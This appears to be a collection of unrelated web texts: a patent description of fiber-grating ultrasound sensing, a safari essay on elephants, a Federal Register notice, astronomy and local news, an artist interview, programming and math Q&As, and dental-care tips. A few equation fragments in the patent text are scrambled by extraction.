Next, referring to Fig. 5, the influence of the relationship between the Bragg wavelength of the FBG 12 and the transmittance peak wavelength of the Fabry-Perot filter 14 on the sensitivity of ultrasound detection will be described. In Fig. 2, the uniaxial displacement stage 18 is moved so that the FBG 12 is provided with strain, and the Bragg wavelength is changed, so as to detect the ultrasound propagated through the optical fiber from the ultrasound oscillator 17. Herein, three states; that is, a state in which filter-transmittance peak wavelength λ matches wavelength λ at which the reflectance of the FBG is decreased by half (Fig. 5(a)), a state in which the Bragg wavelength of the FBG is located in the middle of adjacent filter-transmittance peak wavelengths (Fig. 5(b)), and a state in which the filter-transmittance peak wavelength λ matches the Bragg wavelength λ of the FBG (Fig. 5(c)), are created, and the ultrasound generated by the ultrasound oscillator is detected by the FBG 12.
i
-3dB
i
B
Fig. 6 shows the individual response signals in the above three states and it also shows an excitation signal inputted to the ultrasound oscillator. Namely, in Fig. 6, the photoelectric converter 15 converts the filter-transmitted-light intensity corresponding to the area surrounded by the Fabry-Perot filter transmitted-light intensity curve in Fig. 5(a) to (c) into a voltage signal, and the signal intensity corresponds to the ultrasound (elastic wave) detected by the FBG 12. It is seen from Fig. 6 that, when the filter-transmittance peak wavelength λ is located at the wavelength λ at which the reflectance of the FBG 12 is decreased by half, the ultrasound is detected with high sensitivity. Since the gradient of the change of the relationship between the reflectance and the wavelength is large and the filter-transmitted-light intensity is sufficient at the wavelength at which the reflectance of the FBG 12 is decreased by half, the ultrasound can be detected with high sensitivity. However, such ultrasound is hardly detected under the other two conditions; that is, the case in which the Bragg wavelength of the FBG 12 is located in the middle of the adjacent filter-transmittance peak wavelengths and the case in which the filter transmittance peak λ matches the Bragg wavelength λ of the FBG 12. This is because, in the case of Fig. 5(b) and (c), there is almost no change in the integration value (area) of the Fabry-Perot filter transmitted-light intensity even when the intensity distribution of the light reflected from the FBG is somewhat displaced due to ultrasound.
i
B
Considering the present embodiment more specifically, when the Bragg wavelength of the FBG 12 is located in the middle of the adjacent filter-transmittance peak wavelengths, as can be seen from Fig. 3, there is caused almost no filter transmitted-light intensity associated with a change in the Bragg wavelength of the FBG 12. For example, when the FBG 12 receives tension and the reflection characteristics are caused to shift toward the longer wavelength side, while the transmitted-light intensity in a transmission region existing on the longer wavelength side is increased, the transmitted-light intensity in a transmission region existing on the shorter wavelength side is decreased. Namely, changes of the transmitted-light intensities in the adjacent filter transmission regions cancel each other out. Further, when the filter transmittance peak λ and the Bragg wavelength λ of the FBG 12 match with each other, the gradient of the change of the relationship between the reflectance and the wavelength near the Bragg wavelength is small. Thus, even when the Bragg wavelength fluctuates, a change in the filter transmitted-light intensity is small. For these reasons, under the above two conditions, the sensitivity of AE/ultrasound detection is decreased. However, it is assumed that the AE/ultrasound can be detected under conditions other than those two conditions, while the sensitivity varies depending on the positional relationship between the Bragg wavelength and the filter-transmittance peak wavelength.
Fig. 7 shows a basic structure of an AE/ultrasound detection system 2 according to a second embodiment. In the AE/ultrasound detection system 2 of the second embodiment, a broadband light source 20 and two Fabry-Perot filters 25 and 26 are combined.
As shown in Fig. 7, the AE/ultrasound detection system 2 is used for evaluating the soundness of an object-to-be-inspected 23, and it comprises: the broadband light source 20; an optical circulator 21; an FBG 22 (having been subjected to an apodization process); a Fabry-Perot filter (1) 25; a Fabry-Perot filter (2) 26; temperature controllers 27 and 28; a photoelectric converter (1) 29; a photoelectric converter (2) 30; and a data acquisition unit 31.
In Fig. 7, broadband light from the broadband light source 20 enters the FBG 22 via the optical circulator 21. The reflected light from the FBG 22 enters the two Fabry-Perot filters 25 and 26 via the optical circulator 21 and a 1×2 coupler 24. The FBG 22, and the Fabry-Perot filters 25 and 26 used herein are the same as those used in the first embodiment, and as shown in Fig. 9, the temperature controllers 27 and 28 attached to the Fabry-Perot filter (1) 25 and the Fabry-Perot filter (2) 26 make adjustments so that the transmittance peak wavelengths of the two Fabry-Perot filters are separated by FSR/4. While the transmission wavelengths of the Fabry-Perot filters 25 and 26 vary upon receiving the influence of temperature, commercially available Fabry-Perot filters are adapted so that the transmittance wavelengths thereof can be controlled by temperature controllers. Further, by maintaining the temperatures of the Fabry-Perot filters 25 and 26 to be constant with the use of the temperature controllers 27 and 28, it becomes possible to maintain the filter-transmittance peak wavelengths to be constant. The transmitted light from the Fabry-Perot filters 25 and 26 is supplied to the photoelectric converters 29 and 30, respectively. In the photoelectric converters 29 and 30, the light is converted into an electrical output corresponding to the transmitted-light intensity. The data acquisition unit 31 causes a display unit not shown in the figure to display or a recording device not shown in the figure to record the electrical output, as the AE/ultrasound detected by the FBG 22.
Next, an AE/ultrasound measurement experiment will be described so that the operation of the AE/ultrasound detection system 2 of the present embodiment will be understood more clearly. Fig. 8 shows a system for the experiment, and an ultrasound oscillator 32 and a uniaxial displacement stage 33 are provided in order to represent a pseudo strain placed on the object-to-be-inspected when conducting the experiment. The other features are the same as those of Fig. 7. Namely, a portion of the optical fiber is attached to the ultrasound oscillator 32, a portion between the FBG 22 and the end of the optical fiber is attached to the uniaxial displacement stage 33, and the uniaxial displacement stage 33 is moved, so as to cause a strain to the object-to-be-inspected 23.
Sensitivity
=
d
R
d
λ
2
In this experiment, the system shown in Fig. 8 is used for the experiment, and in order to examine the influence of the relationship between the Bragg wavelength of the FBG 22 and the transmission peak wavelength of the Fabry-Perot filter on the sensitivity of ultrasound detection, the FBG 22 is provided with a strain, the Bragg wavelength is changed, and the ultrasound is then detected. As shown in Fig. 9, the Bragg wavelength of the FBG is fluctuated so that a relative wavelength between the Bragg wavelength of the FBG and the transmittance peak wavelength of the Fabry-Perot filter (1) falls within the range from -FSR/2 to 0. Fig. 10 shows the intensity of the amplitude of the ultrasound response measured based on the intensity of the transmitted light from each of the Fabry-Perot filter (1) 25 and the Fabry-Perot filter (2) 26, when the Bragg wavelength of the FBG 22 is fluctuated. Further, the sensitivity of the ultrasound response is represented as Expression (1) in view of the relationship between reflectance R and wavelength λ of the FBG.
Note that Fig. 10 also shows theoretical sensitivity curves that can be expected based on Expression (1).
The response intensity obtained from the experiment using the Fabry-Perot filter (1) 25 and the Fabry-Perot filter (2) 26 corresponds to the tendency expected based on the theory very well. Further, a large response amplitude can be obtained through synthesis processing that adds and subtracts outputs from both of the filters. For example, when the relative wavelength is -3FSR/8 (-0.15 nm), the response outputs from the Fabry-Perot filter (1) 25 and the Fabry-Perot filter (2) 26 are as shown in Fig. 11.
As shown in Fig. 12(a), when the relative wavelength between the Fabry-Perot filter (1) 25 and the Bragg wavelength of the FBG 22 falls in the range of-FSR/2 to -FSR/4, the peak wavelengths of the Fabry-Perot filter (1) 25 and the Fabry-Perot filter (2) 26 exist in the left half of the reflection wavelength region of the FBG, and the response changes depending on the AE/ultrasound from both of the filters are in phase with each other. Thus, a large response signal as shown in Fig. 11 can be obtained by adding an output P1 from the photoelectric converter (1) 29 for measuring the intensity of the transmitted light from the Fabry-Perot filter (1) 25 and an output P2 from the photoelectric converter (2) 30 for measuring the intensity of the transmitted light from the Fabry-Perot filter (2) 26.
Further, when the relative wavelength of the Fabry-Perot filter (1) 25 falls in the range of -FSR/4 to 0, as shown in Fig. 12(b), since the peak wavelengths of the Fabry-Perot filter (1) 25 and the Fabry-Perot filter (2) 26 are separated on the left side and the right side of the Bragg wavelength of the FBG 22, the response changes of both of the filters are in opposite phase with each other. Thus, a large response signal can be obtained by subtracting the output P1 and the output P2.
The data acquisition unit 31 of Fig. 8 performs such addition or subtraction on the outputs P1 and P2 from the photoelectric converter (1) 29 and the photoelectric converter (2) 30, and it allows the displaying/recording of the larger one of the response amplitudes as the AE/ultrasound received by the FBG 22.
Fig. 13 shows ideal FBG reflection characteristics for AE/ultrasound detection. It is assumed that, based on the systems according to the above first and second embodiments, if the FBG characteristics exhibited triangular reflection characteristics as shown in Fig. 13, it could be possible to realize constant AE/ultrasonic detection sensitivity, irrespective of the Bragg wavelength of the FBG. However, the creation of a FBG having such triangular reflection characteristics is practically impossible.
Consequently, as shown in Fig. 14(a), for AE/ultrasound detection, it is desirable to use an FBG having reflection characteristics in which the reflectance is not saturated even in a wavelength region in which the reflectance reaches maximum. On the other hand, an FBG having such reflectance as shown Fig. 14 (b); that is, the reflectance saturated in a wavelength region in which the reflectance reaches maximum, is not desirable, since in such case, the detection sensitivity may reach zero upon AE/ultrasound detection.
(1) While in the above first and second embodiments, the reflected light from the FBG is caused to enter the Fabry-Perot filter, it is conceivable that even if the transmitted light from the FBG is caused to enter the Fabry-Perot filter in such manner as shown in Fig. 15, the AE/ultrasound detection is possible under the same conditions.
(2) While in the above first and second embodiments, a Fabry-Perot filter is used as an optical filter having periodic transmission characteristics, similarly, it is conceivable that, if a system as shown in Fig. 16 is structured with the use of an AWG (Arrayed-Waveguide Grating) having periodic transmission characteristics, the AE/ultrasound detection can be similarly made. In such case, the transmission characteristics of the AWG are made the same as those in the system using the Fabry-Perot filter.
With the use of the AE/ultrasound measuring technique using the FBG as described above, it is conceivable that the soundness of a structure can be monitored by attaching the FBG to a structure-to-be-inspected and then detecting the AE generated upon microscopic material destruction. Alternatively, such technique can be applied for detecting defection using ultrasound, for example.
In accordance with one embodiment of the present invention, a broadband-wavelength light is caused to enter the FBG attached to an object-to-be-inspected, part of the reflected light (or the transmitted light) from the FBG is transmitted through a Fabry-Perot filter (or an AWG filter) having periodic transmission characteristics, and the intensity of the light transmitted through the filter is converted into an electric signal. Thus, even when the Bragg wavelength of the FBG is fluctuated due to temperature or strain, the AE/ultrasound received by the FBG can be detected.
Since the Fabry-Perot filter has an FSR equal to or greater than the reflection wavelength band or transmission wavelength band of the FBG, AE/ultrasound detection can be made more reliably.
Further, since the filter-transmission peak wavelength is controlled (with the use of a temperature controller) so that it is equal to the wavelength at which the reflectance or transmittance of the FBG is decreased by half, the AE/ultrasound can be detected with high sensitivity.
In accordance with another embodiment of the present invention, broadband wavelength light is caused to enter the FGB attached to an object-to-be-inspected, the reflected light (or the transmitted light) from the FBG sensor is divided so as to produce two kinds of reflected light, part of the reflected light is transmitted through Fabry-Perot filters having periodic transmission characteristics (AWG filters may alternatively be used. The transmittance peak wavelengths of the two filters are separated from each other by FSR/4), and the intensity of the transmitted light from each of the two filters is converted into an electrical signal. Thus, even when the Bragg wavelength of the FBG is fluctuated due to temperature and strain, the AE/ultrasound received by the FBG can be detected. Further, since the electrical signal corresponding to the intensity of the transmitted light from each of the filters is subjected to addition and subtraction processes, even when response changes depending on the AE/ultrasound are in phase or opposite phase with each other, a large response signal can be reliably obtained, and therefore, AE/ultrasound detection can be made reliably.
While embodiments of the present invention have been described above, the present invention is not limited thereto. Needless to say, any structural modification, addition, or substitution is possible, without departing from the essential scope of the present invention. | |
1. A multifunctional office building with a built-up area 500 square meters, wherein the company’s offices, cafeteria and a hall for seminars and training at the future vocational and training center. Specialists on production and mounting of Al and PVC joinery will be trained in this center.
2. A two-story production hall with a total built-up area of 1350 square meters, wherein the shops for the production of Al and PVC joinery, balustrade structures and furniture systems are located. On an area of 400 square meters, there is a warehouse for selling Al and PVC systems with an adjoining showroom with an area of 100 square meters.
3. A three-storey trade center with a total built-up area of 6000 square meters, of which 2000 square meters have been put into operation for trade and storehouse activities.
The Center is located at the exit from Plovdiv to Pazardzhik and is easily accessible, with a sufficient number of parking places. Its proximity to the Metro and Technomarket chains is a prerequisite for a busy trade activity. | http://profil-i.com/index.php?option=com_content&task=view&id=14&Itemid=91 |
We’re driving through the Naboisho Conservancy; it’s one of the Masai Mara National Reserve’s calmer cousins. Naboisho’s profile may not be quite so famous as that of her mega-star neighbour, The Masai Mara, but nor are quite so many people fighting to take snap shots of her. And this is just one of the many advantages enjoyed by the fourteen or so conservancies that encircle the Reserve. Not only are they places of calm and retreat for humans and animals alike but they also offer a much more intimate game-viewing experience, a greener eco-lodge profile and an infinitely wider range of activities. You can, for instance, walk in the conservancies, horse ride, camel ride and bike ride too. You can also interact much more authentically with such ethnic groups as the Maasai, who offer village visits, craft markets and heritage displays. Typically, in the trans-Mara region, the conservancy land is Maasai-owned, which means that the Maasai community also benefits from the incoming tourism dollars. Finally, because vehicle numbers are limited and the ratio of beds to square kilometers is vastly reduced, you may rest assured of seeing the optimum species of wildlife and the minimum of your own. The conservancies, then, are to the Kenyan national parks and reserves what fringe theatre is to Broadway.
Right now we’re driving through one of Naboisho’s denser thickets. The track, seldom used, is tortuous and the safari vehicle is lurching from rut to rut like a ship in a storm. Its suspension, aggravated by dust, is complaining bitterly and so would we be: if we dared. But our driver/guide is not a man to be trifled with. He’s traditionally dressed in a scarlet Masai shuka, bandoliers of beads glitter across his chest and the dagger in his belt would make a rampaging lion think twice. Despite all this, however, our attention is wandering.
Why? Well, the sad fact of game-driving is that it is time sensitive. There is only so long you cling to the edge of your seat poised for imminent safari drama. Only so long you can keep your eyes peeled and your inner cave man primed for blood. And we’ve crossed the attention threshold. Mobiles are being fingered; cameras have been discarded. This is the moment beloved of safari guides. ‘Do you see him?’ ours asks. See what we wonder? We’re surrounded by thick undergrowth. A stream flows through a miniature valley, its banks are quilted with green moss and sprout tight-curling primordial ferns. It’s only as a large grey trunk snakes into view, gently winds itself around a fern and brutally rips it from the ground that we see the elephant. It’s a bull and he’s straddling the stream. It’s a tight fit – cork in a bottle – but he’s fern-harvesting with single-minded determination. Brilliant green fronds stick out from either side of his mouth. Up comes his trunk to push them more firmly between his masticating jaws. Down it goes again to wrench more greenery from the ravaged ground. His trunk is a formidable implement weighing around 400 pounds and containing around 100,000 different muscles. And at its end, or so we are told, are some finger-like appendages so delicate that he could pluck a single blade of grass.
‘He’s a leftie’, observes our guide. We stare at the back of the man’s head. It’s all we can see of him perched as we are on our raised seats. Is this a manifestation of the famous Maasai humour? Is he suggesting that elephants have political leanings? ‘Look at his tusks,’ the guide says ‘the left is shorter than the right’. We look: he’s right. Elephants, the guide explains are like humans in so much as they are either right or left tusked (‘lefties’ or ‘righties’ in safari-speak). And, because they use the same tusk to strip bark, tear leaves or fight other elephants – so it is that the more frequently used tusk grows gradually shorter over time.
We watch entranced as the elephant decimates the ferns. The sound effects are impressive – a ruthless tearing, a massive, mauling, mastication; and the odd blow-off of gas as profound as a Texan oil well. The guide has our attention now – and the facts come thick and fast. We learn that an elephant must feed for 12-18 hours a day, consume 200-600 pounds of vegetation, expel 250 pounds of manure a day whilst dealing with a digestive system so poor that it functions at only 50% efficiency. Despite all this volcanic internal activity, however, the elephant has an extremely slow pulse rate of around 27 beats per minute as compared to that of the average human being whose heart beats 80 times per minute (or the canary whose heart pounds at 1000 beats per minute). We learn that bulls can grow up to 13 feet in height, cover 30 feet from trunk to tail, and weigh up to 14,000 pounds. ‘Which is why’ continues our guide, ‘they are the only mammal that can’t jump’. As facts go, this one is slightly left-of-field and we’re temporarily silenced by the mental image of an elephant jumping. But the next fact bowls us over: African elephants, it appears, walk on their toes, as if they are wearing high heels.
The guide has to be kidding. And yet he’s not. Studies of elephant walking patterns (using pressure-sensing platforms to map the distribution of weight on elephantine feet) have revealed that elephants put the most pressure on the outer toes of their front feet and the least amount of pressure on their heels – they tip-toe.
This elephant is far too tightly wedged between the banks of the stream for us to judge whether or not he appears to be walking in heels. But as we return to our camp, we encounter a matriarchal herd. There are nine of them, graduated in size from impossibly tiny to dauntingly huge and they’re doing what elephants do best – tearing branches off trees and cramming them into their mouths. Spellbound, we stare at their feet.
Heels are not in evidence.
Elephantine facts
Elephants have highly developed brains, the largest in the entire animal kingdom (three to four times larger than a human brain.)
Though incapable of jumping, elephants can run at a speed of 25 miles (40 km) per hour. Yet even when they are moving at their fastest, they still keep at least one foot on the ground at all times.
Elephant eyelashes grow up to five inches in length.
Elephant skin is over an inch thick. But because it’s loaded with nerve endings, their skin is also highly sensitive.
Elephants from the same herd will often use touch to greet each other, either wrapping their trunks around each other or giving each other friendly taps on the body.
In addition to trumpeting, elephants purr much like cats do. Research has also shown that they can communicate over long distances using a sub-sonic rumble that travels over ground faster than sound through air. Other elephants receive these messages through their feet and trunks.
Elephants have large, thin ears that contain a complex network of blood vessels that help to regulate body temperature. The average ear of a male African elephant weighs over 100 pounds.
The tusk of a male elephant grows at a rate of around 7 inches per year. | https://whyilovekenya.com/portfolio-items/elephants-in-heels/ |
Q:
How to tell a GridView to open a HyperLink on a CellClick?
I have a GridView with several columns. One of my columns is a TemplateField containing a HyperLink.
I want that hyperlink "clicked" if the user clicks anywhere in the respective row. If the user clicks in Column2 of Row1, I want the page to behave as if the user clicked on the link in Column1 of Row1.
How can I realise such feature?
A:
Just add a javascript onClick event handler to the row.
You can do that in the onItemDataBound event where you can get at the url in your first column
| |
AGENCY:
Office of Fossil Energy, DOE.
ACTION:
Notice of application.
SUMMARY:
SESCO Enterprises, LLC. (SESCO) has applied for authority to transmit electric energy from the United States to Canada pursuant to section 202(e) of the Federal Power Act.
DATES:
Comments, protests or requests to intervene must be submitted on or before July 1, 2004.
ADDRESSES:
Comments, protests or requests to intervene should be addressed as follows: Office of Coal & Power Import/Export (FE-27), Office of Fossil Energy, U.S. Department of Energy, 1000 Independence Avenue, SW., Washington, DC 20585-0350 (FAX 202-287-5736).Start Further Info
FOR FURTHER INFORMATION CONTACT:
Rosalind Carter (Program Office) 202-586-7983 or Michael Skinker (Program Attorney) 202-586-2793.End Further Info End Preamble Start Supplemental Information
SUPPLEMENTARY INFORMATION:
Exports of electricity from the United States to a foreign country are regulated and require authorization under section 202(e) of the Federal Power Act (FPA) (16 U.S.C. 824a(e)).
On March 12, 2004, the Office of Fossil Energy (FE) of the Department of Energy (DOE) received an application from SESCO to transmit electric energy from the United States to Canada. SESCO, a power marketer and limited liability company formed under Delaware law with its principal place of business located in Iselin, NJ, has requested an electricity export authorization with a 5-year term. SESCO does not own or control any transmission or distribution assets, nor does it have a franchised service area. The electric energy which SESCO proposes to export to Canada would be purchased from electric utilities and Federal power marketing agencies within the U.S.
SESCO proposes to arrange for the delivery of electric energy to Canada over the existing international transmission facilities owned by Basin Electric Power Cooperative, Bonneville Power Administration, Eastern Maine Electric Cooperative, International Transmission Company, Joint Owners of the Highgate Project, Long Sault, Inc., Maine Electric Power Company, Maine Public Service Company, Minnesota Power Inc., Minnkota Power Cooperative, New York Power Authority, Niagara Mohawk Power Corporation, Northern States Power, Vermont Electric Power Company and Vermont Electric Transmission Company. The construction, operation, maintenance, and connection of each of the international transmission facilities to be utilized by SESCO, as more fully described in the application, has previously been authorized by a Presidential permit issued pursuant to Executive Order 10485, as amended. Start Printed Page 30891
Procedural Matters: Any person desiring to become a party to this proceeding or to be heard by filing comments or protests to this application should file a petition to intervene, comment or protest at the address provided above in accordance with §§ 385.211 or 385.214 of the FERC's Rules of Practice and Procedures (18 CFR 385.211, 385.214). Fifteen copies of each petition and protest should be filed with DOE on or before the date listed above.
Comments on the SESCO application to export electric energy to Canada should be clearly marked with Docket EA-292. Additional copies are to be filed directly with Matthew Gorisch, Managing Director, and Michael Schubiger, Chief Executive Officer, SESCO Enterprises, LLC., 120 Wood Avenue South, Suite 511, Iselin, NJ 08830.
A final decision will be made on this application after the environmental impacts have been evaluated pursuant to the National Environmental Policy Act of 1969, and a determination is made by the DOE that the proposed action will not adversely impact on the reliability of the U.S. electric power supply system.
Copies of this application will be made available, upon request, for public inspection and copying at the address provided above or by accessing the Fossil Energy Home Page at http://www.fe.de.gov. Upon reaching the Fossil Energy Home page, select “Electricity Regulation,” and then “Pending Procedures” from the options menus.Start Signature
Issued in Washington, DC, on May 20, 2004.
Anthony J. Como,
Deputy Director, Electric Power Regulation, Office of Coal & Power Import/Export, Office of Coal & Power Systems, Office of Fossil Energy. | https://www.federalregister.gov/documents/2004/06/01/04-12268/application-to-export-electric-energy-sesco-enterprises-llc |
Most of the stars in our Milky Way galaxy lie in a very flat, pinwheel-shaped disk. Although this disk is prominent in images of galaxies similar to the Milky Way, there is also a very diffuse spherical “halo” of stars surrounding and enclosing the disks of such galaxies.
Recent discoveries have shown that this outer halo of the Milky Way is probably composed of small companion galaxies ripped to shreds as they orbited the Milky Way.
A discovery announced today by the Sloan Digital Sky Survey (SDSS) reveals a clump of stars unlike any seen before. The findings may shed light on how the Milky Way’s stellar halo formed.
This clump of newly discovered stars, called SDSSJ1049+5103 or Willman 1, is so faint that it could only be found as a slight increase in the number of faint stars in a small region of the sky.
If Willman 1 does turn out to be a dwarf galaxy, this discovery could shed light on a long-standing mystery.
The prevailing ‘Cold Dark Matter’ model predicts that our own Milky Way galaxy is surrounded by hundreds of dark matter clumps, each a few hundred light years in size and possibly populated by a dwarf galaxy.
However, only 11 dwarf galaxies have been discovered orbiting the Milky Way. Perhaps some of these clumps have very few embedded stars, making the galaxies particularly difficult to find.
“If this new object is in fact a dwarf galaxy, it may be the tip of the iceberg of a yet unseen population of ultra-faint dwarf galaxies,” suggests Willman.
The Milky Way has been an area of intense research by SDSS consortium members.
“The colors of the stars in Willman 1 are similar to those in the Sagittarius tidal stream, a former dwarf companion galaxy to the Milky Way now in the process of merging into the main body of our Galaxy,” explains Brian Yanny, an SDSS astrophysicist at The Department of Energy’s Fermi National Accelerator Laboratory, a leader in research on the Milky Way’s accretion of material.
“Whether it is a globular cluster or a dwarf galaxy, this very faint object appears to represent one of the building blocks of the Milky Way,” Willman said. | https://www.universetoday.com/9978/mystery-object-in-the-milky-ways-halo/ |
Born in Mexico in 1981, Carmen Argote is a multidisciplinary artist, whose practice, combining installation, painting, photography and video, explores the delicate and complex notion of home.
When she was five, Argote’s family moved to Los Angeles, where her father, a trained architect, took up several jobs, though he continued to draft architectural drawings — notably the blueprint of a house he had promised to his family. This visual representation of abstract spaces, together with Argote’s family history and memories, have deeply influenced her work. Her practice inhabits a space in between reality and and abstraction, memory and history, Mexico and Los Angeles.
From the exhibition Houses he wanted to build at Adjunct Positions, Los Angeles. November 7 – December 12. Courtesy the artist.
The influence of her family’s narrative on the construction of her own identity is deeply present in Carmen’s work. Her project My father’s side of home saw Carmen take up residence in Mansión Magnolia, the Guadalajara mansion once owned by her family turned into an events space. Another of her projects, titled Houses he wanted to build took the form of a site-specific installation at the LA project space Adjunct Positions, where the artist hung a series of mantas from the building’s eaves, of a typically Mexican fabric, painted with the silhouette of a house drawn by her father — effectively giving life to his architectural drawings.
Far from being a straightforward idea, the notion of home is complicated by Argote’s experience as an immigrant, as well as the confluence of transnational cultural influences in her own experience.
Carmen Argote’s work is currently on display at LACMA as part of the group exhibition “HOME — So Different, So Appealing”. H A P P E N I N G spoke to the artist ahead of the opening of LISTE.
Could you briefly explain the work you are presenting at LISTE?
The work I am showing at LISTE was part of an installation called Alex’s Room. Alex is my younger sister and the universe that is contained in the work all takes place within her tiny studio apartment. The works on view are created by layering repeated photographs that are cut into, and layered, to create the idea of an expansive space.
Alex’s Room acknowledges that through the rearrangements of personal objects, we can transform the spaces around us. These works touch on how we can change the architecture around us in rearranging our things — creating expansive psychological spaces within our living environments. These works also challenge the notion of social class — commenting on the contemporary culture of throwing things away and stigmatizing those who collect and relish in their belongings.
There seems to be a lot of focus on space and context in your work. Does this influence the way you present your work at fairs? Do you adjust your work to the environment you are showing in?
My work responds to a site, its dimensions, its context and relationship to how bodies move within it. I often consider each showing of the work as an opportunity to grow the ideas in the work further. At fairs, it’s harder to say. In a group context, I have to let go of some of that control to allow for the gallery’s focus to come more into play. It’s more about the conversation they build between the artist’s work on show.
You’ve spoken of your father influence on your work. Do people appreciate the architectural aspect of your work?
I think that people appreciate the influence of architecture in my work because architecture is a vehicle through which personal narratives are explored. They also evoke broader ideas of class, cultural influence and immigration.
Do you feel that different audiences react differently to your work?
People who understand this idea of being in in-between places or that can connect with notions of duality often see the more nuanced ideas within the work.
Installation view of Alex’s Room at Commonwealth and Council. Courtesy the artist.
Do you feel your experience of immigration is reflected into your work?
I think that it has to do with having a point of view that ‘folds over itself’— immigration is an experience that produces layered cultural perspectives. My immigrant experience is, for example, reflected in how I relate to the aesthetics of modernism and minimalism. My interest does not lie in the purity of a form, but more in my father’s in-plan drawings of houses he wanted to build in Mexico. For Los Angeles audiences, the first thing that comes to mind is Donald Judd. I guess the awareness of that flip, and the dual nature of that context in my work — those conversation which arise — is what I think the immigrant perspective brings. I think I create work that exists in a state of in-betweenness, situated in shifting frameworks (conceptual and aesthetic), which echoes my own experiences in life, and how I navigate cultures.
LISTE is open to the public from June 13 through 18. Carmen Argote’s work is on show at Instituto de Vision’s booth.
Carmen Argote's portrait: courtesy the artist. | https://www.happening.media/category/magazine/en/articles/2853/carmen-argote-architecture-of-emotions |
GONZALES - Firefighters say a carport fire at a house in the 1600 block of South Augusta Street completely destroyed the residence, along with a vehicle in the carport, Saturday morning.
City of Gonzales firefighters were dispatched to the scene on Sept. 12 at 6:30 a.m. when the fire quickly spread from the carport to the roof of the house.
Firefighters worked for 45 minutes to bring the fire under control, but due to the extensive damage, the home and vehicle were declared total losses.
Two adults and four children were inside the house at the time, but they were able to make it to safety before the blaze spread.
Gonzales FD says the fire is currently under investigation with the family currently staying at the Ascension Fire House while receiving assistance from the Red Cross. | https://www.wbrz.com/news/carport-fire-destroys-home-vehicle-in-gonzales |
Q:
A simple derivation
During the study of a paper I see that its author defines
$$\frac{dh^{ab}}{d\tau}:=h^{am}h^{bn}\frac{dh_{mn}}{d\tau}$$
and from this concludes that
$$\frac{d}{d\tau}(h^{ab})=\frac{d}{d\tau}(h^{am}h^{bn}h_{mn})=-\frac{dh^{ab}}{d\tau}$$
where $h_{ab}$ is a Riemannian metric that depends on the parameter $\tau$.
I Can not derive last equation. Can someone point me in the right direction? Sorry, if my question is very obvious!
A:
I think you should have a lowered index on the RHS:
$$\begin{align}
\frac{dh_{ab}}{dt} &= \frac{d}{dt}\left(h_{ma}h_{nb}h^{mn}\right)\\
&=\frac{dh_{ma}}{dt}\delta_{b}{}^{m} + \frac{dh_{nb}}{dt}\delta_{a}{}^{n} + h_{ma}h_{nb}\frac{dh^{mn}}{dt}\\
\frac{dh_{ab}}{dt}&= 2 \frac{dh_{ab}}{dt} + h_{ma}h_{nb}\frac{dh^{mn}}{dt}\\
\frac{dh_{ab}}{dt} &= -h_{ma}h_{nb}\frac{dh^{mn}}{dt}
\end{align}$$
| |
Brushing your teeth should be part of your everyday life, something that you have done since you were old enough to reach the bathroom sink on your own. It is such a basic part of your day that it requires little to no thought in order to get the task done. However, there are a lot of common mistakes that are made when brushing your teeth that it is important to put a little thought to it and make sure that you are doing the best you can for your dental health.
- Take it easy on your teeth and gums
It is a common mistake that the harder you brush your teeth the cleaner they will become. Actually, the harder you brush your teeth, the more damage you could be doing to your gums. Plaque that forms on your teeth is soft and loose and can be cleaned away with the motions of gentle brushing. You should think about brushing your teeth as a way to give your teeth and gums a gentle massage and not as scrubbing them clean.
- Don’t rush the process
Since brushing is something you do when you are starting your day and right before you go to bed, the process tends to be rushed. Give yourself time to brush your teeth. You should take at least two full minutes to properly and gently cleanse each part of your mouth.
- Pick the right brush
Choosing the right toothbrush is just as important as choosing the right outfit for the day. The brush should have soft bristles, not hard. The soft bristles will help you massage your teeth instead of scrubbing them. The brush head itself should be the right size for your mouth, especially if you have a smaller mouth. There are a lot of brushes to select from and choosing one with the right angle, size and flexibility is important in achieving a good and cleansing brush.
- Change your toothbrush frequently
After finding the perfect toothbrush, you may feel inclined to hold on to it too long. Once the bristles are frayed the toothbrush loses its cleaning power. Replace your toothbrush approximately every three to four months, or sooner if it is looking a little beat up.
- Use a proper brushing motion
You may think that you need to follow the line of your teeth and just brush back and forth, however in order to properly massage your teeth, you should use more of a circular motion while brushing. This technique will allow you to clean the whole tooth and not just run the brush past the teeth in a straight line. Angle the brush at a 45-degree angle toward the gum line. Doing this will allow you to get to slightly under the gum to clean out any debris that is lingering there. Lastly, do not forget to brush your tongue. Bacteria builds up on the tongue, both on the top and on the sides, so before you conclude your brushing session, make sure to brush that bacteria off your tongue.
Brushing your teeth is one of the most important aspects of your dental health, so don’t put this chore on autopilot. Try to pay attention to the task at hand and put care and thought into brushing your teeth. Make sure to do this twice a day, and you will be on the road to a very clean and happy mouth. | https://www.sfoms.com/am-i-brushing-my-teeth-correctly/ |
Hundreds of drinking fountains won't be turned on turned on to start the summer in Chicago because of the threat of lead in the water.
The Chicago Park District is once again conducting testing, which it's been doing for two years now since the ABC7 I-Team originally reported on led in drinking fountain water.
More than 600 city parks will soon bustle with children and tourists. But the Chicago Park District announced hundreds of public drinking fountains won't be turned on, citing potentially dangerous levels of lead.
"You've got to find solutions somewhere. It's kind of unfortunate, right? Not being able to drink public water," said Andri Vasilj, visitor from California.
Monday the Park District announced that of 1,250 water fountains, approximately 550 - or nearly half -- in "low traffic areas" will remain shut off until they are remediated or removed. Five hundred fountains will return to push button use and 100 will never be shut off, continuously flowing in high traffic areas. One hundred other fountains have been removed.
"We were wondering why the fountains weren't on, so I thought they might be broken, I was going to give the city a call to see," said Dave Falguni, Chicago resident.
Leaving some 100 fountains continuously on, district officials believe, will keep lead levels below what the EPA deems unsafe.
"Wasting so much water I mean, there's no reason for that. For us tourists that come, we want to be safe drinking so," said Margarita Gerges, visitor.
The Centers for Disease Control and Prevention says no level of lead is safe. | |
UPDATE: ULA’s launch of NROL-37 is scrubbed for today. As expected, the weather didn’t cooperate. Next launch window starts Saturday at 1:51 pm ET.
#NROL37 launch on #DeltaIV Heavy is scrubbed for the day. Next launch attempt Saturday at 1:51pmEDT.
Today’s United Launch Alliance spy satellite launch isn’t as unusual as you might think. Just this year, ULA will send five clandestine satellites into orbit for the National Reconnaissance Office (NRO). But today’s launch will be more unique than the other four.
NROL-37 will sit atop a Delta IV-Heavy rocket at launch. The type of rocket hints at where today’s spy satellite launch is heading – geosynchronous transfer orbit (GTO). Here’s what a regular Delta IV Medium rocket looks like (there are several different configurations, but they don’t differ all that much).
Now, here’s the Delta IV Heavy rocket.
The obvious difference is the Heavy variation sports two additional boosters.
